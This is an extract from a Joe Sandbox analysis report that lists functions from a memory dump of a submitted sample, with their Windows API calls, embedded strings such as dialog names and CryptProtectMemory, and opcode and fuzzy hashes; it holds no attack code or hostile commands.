Opcode Fuzzy Hash: 9b099f11ccc841d08b6f70412b6673b8a99ac692d94e76feeccced0175995879
Instruction Fuzzy Hash: C511E533940218BBDB21AAA89D49FFA776CEB49711F140112FAC5F2190C261DE59DF72

Function 00D5B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D5B51E

Part of subcall function 00D5400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D5401D

_wcschr.LIBVCRUNTIME ref: 00D5B53C
_wcschr.LIBVCRUNTIME ref: 00D5B54C

Strings

%c:\, xrefs: 00D5B514

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 5befb6551b772f8577c4e696dcbce7f970b8f31ab04b6470b0996033bd8c4e5b
Instruction ID: c5f7ab3e6378492ff14455cc77391e27d0b46de70b76022f5aeb99753a964002
Opcode Fuzzy Hash: 5befb6551b772f8577c4e696dcbce7f970b8f31ab04b6470b0996033bd8c4e5b
Instruction Fuzzy Hash: 8101F953904311BACF28AB799C42D2BB7ACEE953B2754841BFC49C6081FF20D948C2B2

Function 00D606BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,00D5ABC5,00000008,?,00000000,?,00D5CB88,?,00000000), ref: 00D606F3
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,00D5ABC5,00000008,?,00000000,?,00D5CB88,?,00000000), ref: 00D606FD
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,00D5ABC5,00000008,?,00000000,?,00D5CB88,?,00000000), ref: 00D6070D

Strings

Thread pool initialization failed., xrefs: 00D60725

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: f695a81b112ceb2a332966201875557d32425fedbf7529ab161e5b0623d14384
Instruction ID: 5a98fafa6f2898ca2e14bb87cd78df6778e76067edb0f0cbb14307aac16b46bf
Opcode Fuzzy Hash: f695a81b112ceb2a332966201875557d32425fedbf7529ab161e5b0623d14384
Instruction Fuzzy Hash: C91170B1505709AFC3215FA5DC84AA7FBECEB95755F10482EF1DA83200D6716980CB70

Function 00D6D38B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00D6D3C9, 00D6D3FD
RENAMEDLG, xrefs: 00D6D3DE

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 701088a3a182c92a231c90e9be97d38f581676da4631c754c5ed793e3c2af29c
Instruction ID: b27285f942fbbd4e59a903d3b8bedcbe0b68e6f4742c7844bee602950ba34520
Opcode Fuzzy Hash: 701088a3a182c92a231c90e9be97d38f581676da4631c754c5ed793e3c2af29c
Instruction Fuzzy Hash: 3E017172A00345AFCB119F54FD44A6A3FABEB19790B040426F545D2330CA71DC50EBB1

Function 00D791DE Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 00D79269
__alldvrm.LIBCMT ref: 00D7946A
__alldvrm.LIBCMT ref: 00D7948C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: __alldvrm$_strrchr
String ID:
API String ID: 1036877536-0
Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction ID: ed88838279ad0e4cbd51b41dd47236aa06a62d4b5f70e774efae0569617f2916
Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
Instruction Fuzzy Hash: 14A16A739003469FDB21CF68C8A17AEFBE5EF51314F18816DE48D9B281E6349942C774

Function 00D5A2AB Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,00D580B7,?,?,?), ref: 00D5A351
CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,00D580B7,?,?), ref: 00D5A395
SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,00D580B7,?,?,?,?,?,?,?,?), ref: 00D5A416
CloseHandle.KERNEL32(?,?,00000000,?,00D580B7,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5A41D

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: File$Create$CloseHandleTime
String ID:
API String ID: 2287278272-0
Opcode ID: f682e712164334411e6fcce2c56f9b31ec6eaab7f26ee86dd7a19befec51134f
Instruction ID: 3ee0acf76780c12a20129092f07c56f45cdb3b0bc5ed962bb169a405cbe90419
Opcode Fuzzy Hash: f682e712164334411e6fcce2c56f9b31ec6eaab7f26ee86dd7a19befec51134f
Instruction Fuzzy Hash: 4341EF302483959AEB21DF68DC45BAFBBE8AB81705F080A1DBDD4D7180D6649A4CDB73

Function 00D7C099 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00D789AD,?,00000000,?,00000001,?,?,00000001,00D789AD,?), ref: 00D7C0E6
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D7C16F
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00D767E2,?), ref: 00D7C181
__freea.LIBCMT ref: 00D7C18A

Part of subcall function 00D78518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID:
API String ID: 2652629310-0
Opcode ID: be1aae010c8f4a43b106227357081eea463d1e2ae7d9a27462ab68c8edef49ba
Instruction ID: 4527da853c97fea86a21cf65552b1826c185f36766a14b2a6fcc2e41efa3d327
Opcode Fuzzy Hash: be1aae010c8f4a43b106227357081eea463d1e2ae7d9a27462ab68c8edef49ba
Instruction Fuzzy Hash: CB31CD72A2021AAFDB248F64DC85DAE7BA5EB40710F498129FC08D6251EB35DD51CBB0

Function 00D72503 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00D7251A

Part of subcall function 00D72B52: ___AdjustPointer.LIBCMT ref: 00D72B9C

_UnwindNestedFrames.LIBCMT ref: 00D72531
___FrameUnwindToState.LIBVCRUNTIME ref: 00D72543
CallCatchBlock.LIBVCRUNTIME ref: 00D72567

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 48ba64a79a36f5e01fb753d8f09a1d124db5fd82d5a82cd91396596d4090380c
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: 3E012532000188BBCF129F65DC41EEA3BBAEF58714F158414FD1C66120E376E961EBB1

Function 00D69DBB Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00D69DBE
GetDeviceCaps.GDI32(00000000,00000058), ref: 00D69DCD
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00D69DDB
ReleaseDC.USER32(00000000,00000000), ref: 00D69DE9

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: e07d826b28c2e8e0c8ba06ded611e014c1092b8c20c4474049537699b1c7485d
Instruction ID: 42d34e07efbe5863600fd79c00d537ac5cd6ed3b5bae2431f5e27cf0486923d7
Opcode Fuzzy Hash: e07d826b28c2e8e0c8ba06ded611e014c1092b8c20c4474049537699b1c7485d
Instruction Fuzzy Hash: 55E0EC32985721E7D3202BA4BC4DBAB7B55AF0AB12F050215F605D6390DA744405DFB1

Function 00D72016 Relevance: 6.0, APIs: 4, Instructions: 14COMMON

Download Yara Rule

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00D72016
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00D7201B
___vcrt_initialize_locks.LIBVCRUNTIME ref: 00D72020

Part of subcall function 00D7310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00D7311F

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00D72035

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction ID: febd7ed3b8640b79be7a304995fcd65a42a760d8e8dc09d69b6d24aa487520b2
Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
Instruction Fuzzy Hash: A5C048240047C8D41E263AB222032BD0B90AC63BCABD6E0C6ECCC27147FE064B0AF032

Function 00D69F5D Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 00D69DF1: GetDC.USER32(00000000), ref: 00D69DF5
Part of subcall function 00D69DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00D69E00
Part of subcall function 00D69DF1: ReleaseDC.USER32(00000000,00000000), ref: 00D69E0B

GetObjectW.GDI32(?,00000018,?), ref: 00D69F8D

Part of subcall function 00D6A1E5: GetDC.USER32(00000000), ref: 00D6A1EE
Part of subcall function 00D6A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00D6A21D
Part of subcall function 00D6A1E5: ReleaseDC.USER32(00000000,?), ref: 00D6A2B5

Strings

(, xrefs: 00D6A0A3

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ObjectRelease$CapsDevice
String ID: (
API String ID: 1061551593-3887548279
Opcode ID: 4c428be5523f58ad376286a1d88b29c80b1a817df6ab08d5d509f8c9722b743d
Instruction ID: 31d14d739ce145f7e421dea18e005ad20a131492253f51ed97dd08d2e7f46da1
Opcode Fuzzy Hash: 4c428be5523f58ad376286a1d88b29c80b1a817df6ab08d5d509f8c9722b743d
Instruction Fuzzy Hash: 7981FF71618314EFC714DF68D844A2ABBE9FF88B14F00491DF98AE7260DB35AD05DB62

Function 00D60E37 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D60FF1

Strings

%ls, xrefs: 00D60E76, 00D60E8C
%s: %s, xrefs: 00D61000

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: _swprintf
String ID: %ls$%s: %s
API String ID: 589789837-2259941744
Opcode ID: 8463e66bd2ce079404c35ee554ab1cf2379e61cec036ddc1ee3d8eb7ad775617
Instruction ID: 2f094d090e2e51b8299dc9274ddf35526d01701285f13da59d71e4409bf846ed
Opcode Fuzzy Hash: 8463e66bd2ce079404c35ee554ab1cf2379e61cec036ddc1ee3d8eb7ad775617
Instruction Fuzzy Hash: DA51B57528C710FFEF312AA4CD02F377E66EB14B01F284906B7DA648D6C693D454A632

Function 00D5772B Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D57730
SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00D578CC

Part of subcall function 00D5A444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A27A,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A458
Part of subcall function 00D5A444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A27A,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A489

Strings

:, xrefs: 00D577A1

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: File$Attributes$H_prologTime
String ID: :
API String ID: 1861295151-336475711
Opcode ID: e6b6a3418e88286afa0a0c33226d4100da3f517a9d900c417aa015630f7f4f6f
Instruction ID: 3eeb71cc15180424c4bc9ac9e313360532944f0c4f18883ea10ce0355bc83cd2
Opcode Fuzzy Hash: e6b6a3418e88286afa0a0c33226d4100da3f517a9d900c417aa015630f7f4f6f
Instruction Fuzzy Hash: D8415D71804228AADF24EB50ED55EEEB77CEF45301F10419ABE09A2192EB745F8CCB71

Function 00D5B66C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 130COMMON

Download Yara Rule

Strings

UNC, xrefs: 00D5B708
\\?\, xrefs: 00D5B6BE, 00D5B6FA, 00D5B75B, 00D5B7AE

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID: UNC$\\?\
API String ID: 0-253988292
Opcode ID: 5af57fdf9881775e77606ad061cce37d854df80221902fc2fbfe29c3c1f8b97b
Instruction ID: 15b054f8ea5c286df9d06a68fb31ad684b4c2a1421522051a71a67d225b567ca
Opcode Fuzzy Hash: 5af57fdf9881775e77606ad061cce37d854df80221902fc2fbfe29c3c1f8b97b
Instruction Fuzzy Hash: CD418335440359AACF20AF21DC42EEF7BA9EF49762F144027FC5497152E770DA48CAB0

Function 00D68FB6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00D68FC4

Strings

about:blank, xrefs: 00D69082
Shell.Explorer, xrefs: 00D68FEF

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID:
String ID: Shell.Explorer$about:blank
API String ID: 0-874089819
Opcode ID: 361f90e3106dc6c6fa135421c3ed95791a457da7264b3a1b10b67cfb44ec4226
Instruction ID: 6abdbed28cde5a3a49f3b95c033602bbbc1127cff9e52075e37202d3b850963d
Opcode Fuzzy Hash: 361f90e3106dc6c6fa135421c3ed95791a457da7264b3a1b10b67cfb44ec4226
Instruction Fuzzy Hash: B72160712143049FCB08AF68D8A5A2AB7ADFF44721B18856DF9498B282DB70EC01CB74

Function 00D5EBF2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

Part of subcall function 00D5EB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00D5EB92
Part of subcall function 00D5EB73: GetProcAddress.KERNEL32(00D981C0,CryptUnprotectMemory), ref: 00D5EBA2

GetCurrentProcessId.KERNEL32(?,?,?,00D5EBEC), ref: 00D5EC84

Strings

CryptProtectMemory failed, xrefs: 00D5EC3B
CryptUnprotectMemory failed, xrefs: 00D5EC7C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

